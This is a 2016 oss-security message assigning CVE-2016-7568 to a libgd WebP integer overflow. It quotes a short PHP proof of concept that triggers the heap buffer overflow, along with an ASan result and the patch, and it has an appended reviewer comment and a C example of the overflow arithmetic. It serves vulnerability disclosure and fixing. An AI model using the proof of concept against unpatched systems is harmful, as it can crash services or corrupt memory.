List: oss-security
Subject: [oss-security] Re: CVE Request: libgd: Integer overflow in function gdImageWebpCtx of gd_webp.c
From: cve-assign () mitre ! org
Date: 2016-09-28 18:54:09
Message-ID: 20160928185409.5FF6C36E015 () smtpvbsrv1 ! mitre ! org
> An integer overflow vulnerability was found in function gdImageWebpCtx
> of file gd_webp.c in libgd. It could lead to a heap buffer overflow
> circumstance. Both PHP 7.0.10 and libgd 2.2.3 were affected.
>
> PHP reported via https://bugs.php.net/bug.php?id=73003
> PHP fixed via https://github.com/php/php-src/commit/c18263e0e0769faee96a5d0ee04b750c442783c6
> libgd reported via https://github.com/libgd/libgd/issues/308
> libgd fixed via https://github.com/libgd/libgd/commit/40bec0f38f50e8510f5bb71a82f516d46facde03
>
> argb = (uint8_t *)gdMalloc(gdImageSX(im) * 4 * gdImageSY(im)); /* integer overflow!!! */
>
> There is no overflow check before calling the gdMalloc function.
>
> POC
> ini_set('memory_limit', -1);
> $im = imagecreatetruecolor(0x8000, 0x8001);
> imagewebp($im, 'php.webp');
> imagedestroy($im);
>
> AddressSanitizer: heap-buffer-overflow
> WRITE of size 1
>
> PATCH
> if (overflow2(gdImageSX(im), 4)) {
> return;
> }
>
> if (overflow2(gdImageSX(im) * 4, gdImageSY(im))) {
> return;
> }
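Review bot: Both guards exit with a bare "return;", so the caller cannot tell an image rejected for its size from one that was encoded and written. Consider reporting the condition (for example through gd_error()) before returning, or having the function return a status its callers can check. Also note that the second guard's "gdImageSX(im) * 4" is only safe to evaluate because the first guard has already passed, so the order of the two checks must be preserved.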
Use CVE-2016-7568.
- --
CVE Assignment Team
M/S M300, 202 Burlington Road, Bedford, MA 01730 USA
[ A PGP key is available for encrypted communications at
http://cve.mitre.org/cve/request_id.html ]
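
The arithmetic behind the report above, as an added example that is not code from libgd, PHP, or the original message: it shows what a 32-bit multiplication yields for the quoted PoC dimensions and how two ordered guards reject them. It assumes a 32-bit int; mul_overflows() is a hypothetical stand-in for an overflow2()-style check, and the 640x480 case is a constructed sample.

```c
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Size that a 32-bit multiplication yields for sx * 4 * sy.
 * Computed in 64 bits and truncated, because signed int overflow is
 * undefined behaviour in C and must not be executed directly. */
static uint32_t wrapped_argb_size(int sx, int sy)
{
    uint64_t wide = (uint64_t)sx * 4u * (uint64_t)sy;
    return (uint32_t)wide;
}

/* Hypothetical stand-in for an overflow2()-style guard (not libgd's code):
 * returns 1 when an operand is non-positive or a * b does not fit in int. */
static int mul_overflows(int a, int b)
{
    if (a <= 0 || b <= 0)
        return 1;
    return a > INT_MAX / b;
}

/* Checked size computation with the same two guards, in the same order,
 * as the quoted fix. Returns 0 and stores the byte count, or -1. */
static int checked_argb_size(int sx, int sy, size_t *out)
{
    if (mul_overflows(sx, 4))
        return -1;
    if (mul_overflows(sx * 4, sy))   /* sx * 4 is safe: first guard passed */
        return -1;
    *out = (size_t)(sx * 4) * (size_t)sy;
    return 0;
}

int main(void)
{
    size_t n = 0;
    /* Dimensions from the quoted PoC: 0x8000 x 0x8001. */
    printf("needed : %llu bytes\n", 0x8000ULL * 4 * 0x8001ULL);
    printf("wrapped: %u bytes\n", (unsigned)wrapped_argb_size(0x8000, 0x8001));
    printf("PoC    : %s\n", checked_argb_size(0x8000, 0x8001, &n) ? "rejected" : "ok");
    printf("640x480: %s\n", checked_argb_size(640, 480, &n) ? "rejected" : "ok");
    return 0;
}
```

The wrapped value is the allocation size the unchecked expression would request, while the encoder still writes 4 bytes for every pixel of the full image.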